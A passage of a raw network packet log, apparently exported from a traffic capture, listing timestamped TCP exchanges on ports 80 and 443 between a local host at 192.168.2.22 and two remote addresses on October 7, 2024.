                                                                                                                                                                    Oct 7, 2024 14:52:47.066380024 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.066389084 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.066404104 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.066425085 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.067126989 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.067142963 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.067158937 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.067179918 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.067193985 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.258405924 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.258430958 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.258464098 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.258481026 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.258497000 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.258517027 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.258544922 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.258544922 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.258589983 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.258959055 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259001017 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259016991 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259016991 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259042025 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259052992 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259104013 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259120941 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259140015 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259149075 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259157896 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259166002 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259172916 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259198904 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259792089 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259838104 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259846926 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259855986 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259881020 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259892941 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.259922028 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259937048 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259953022 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259969950 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.259979963 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260016918 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260016918 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260627985 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.260663033 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.260678053 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.260679007 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260720968 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260763884 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.260780096 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.260795116 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.260797024 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260797024 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260814905 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.260819912 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260827065 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.260854006 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.261627913 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.261670113 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.261740923 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.261831999 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.261867046 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.261867046 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.466742992 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.466767073 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.466794968 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.466810942 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.466826916 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.466844082 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.466856956 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.467128038 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:47.900566101 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:47.900629044 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:47.900727034 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:47.905915976 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:47.905936003 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:48.840301037 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:48.840536118 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:48.847074986 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:48.847091913 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:48.847543001 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:48.847614050 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:48.921183109 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:48.967403889 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.438127041 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.438179970 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.438321114 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.438321114 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.438353062 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.438402891 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.441281080 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.441351891 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.441364050 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.441411018 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.441416979 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.441426992 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.441462994 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.474159002 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.474191904 CEST4434916514.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:49.474205971 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:49.474239111 CEST49165443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:50.211589098 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:50.211642027 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:50.211721897 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:50.212208033 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:50.212218046 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.289706945 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.289832115 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:51.295716047 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:51.295737982 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.296113014 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.303327084 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:51.347404003 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.924400091 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.924454927 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.924750090 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:51.924750090 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:51.924890995 CEST49166443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:51.924932957 CEST4434916614.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.985718012 CEST804916438.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:51.985881090 CEST4916480192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:52:55.143980026 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:55.144023895 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:55.144110918 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:55.144648075 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:55.144664049 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.124809980 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.125008106 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:56.128350019 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:56.128362894 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.128602982 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.140888929 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:56.187396049 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.725347042 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.725375891 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.725428104 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:56.725445986 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.726871967 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:56.726908922 CEST4434916714.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:56.726953983 CEST49167443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:57.007870913 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:57.007891893 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:57.007963896 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:57.008291006 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:57.008304119 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.037086964 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.037214994 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.042814970 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.042834044 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.043212891 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.047688007 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.091417074 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.681356907 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.681397915 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.681716919 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.681746960 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.684717894 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.684786081 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.684803963 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.684843063 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.684887886 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.685044050 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.685059071 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.685086966 CEST49168443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.685091972 CEST4434916814.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.891052961 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.891079903 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:58.891145945 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.891408920 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:58.891419888 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:59.922689915 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:59.922854900 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:59.926263094 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:59.926273108 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:59.926513910 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:52:59.927375078 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:52:59.967410088 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.523547888 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.523574114 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.523634911 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.523650885 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.549009085 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.549093008 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.549165010 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.549165010 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.549361944 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.549391031 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.549403906 CEST49169443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.549410105 CEST4434916914.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.642759085 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.642788887 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:00.642848969 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.643165112 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:00.643178940 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:01.636596918 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:01.636662006 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:01.638020992 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:01.638027906 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:01.639301062 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:01.639311075 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:02.269757986 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:02.269815922 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:02.269923925 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:02.269923925 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:02.270144939 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:02.270160913 CEST4434917014.194.50.211192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:02.270173073 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:02.270204067 CEST49170443192.168.2.2214.194.50.211
                                                                                                                                                                    Oct 7, 2024 14:53:02.272253990 CEST4917180192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:02.279330015 CEST804917138.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:02.279419899 CEST4917180192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:02.279489040 CEST4917180192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:02.286405087 CEST804917138.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:03.091490030 CEST804917138.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:03.091706991 CEST4917180192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:03.429466963 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:03.434582949 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:03.434932947 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:03.434933901 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:03.439795017 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.251970053 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.251987934 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.251998901 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.252008915 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.252019882 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.252214909 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.252216101 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.444832087 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444884062 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444895983 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444905996 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444917917 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444922924 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.444930077 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444922924 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.444941044 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444952965 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.444967985 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.444967985 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.444977045 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.444993973 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.445543051 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.445566893 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.445578098 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.445597887 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.445616007 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640571117 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640599966 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640613079 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640625000 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640635967 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640693903 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640695095 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640695095 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640695095 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640866041 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640878916 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640891075 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640924931 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640935898 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640937090 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.640980005 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640980005 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.640980005 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.641052008 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.641742945 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.641758919 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.641776085 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.641788006 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.641822100 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.641822100 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.641860962 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.724946976 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.725022078 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.833765984 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.833832026 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.833843946 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.833851099 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.833858013 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.833873034 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.833986998 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.834059000 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.834110022 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.834162951 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.834201097 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:04.834213972 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.834247112 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:04.834506035 CEST804917238.240.44.9192.168.2.22
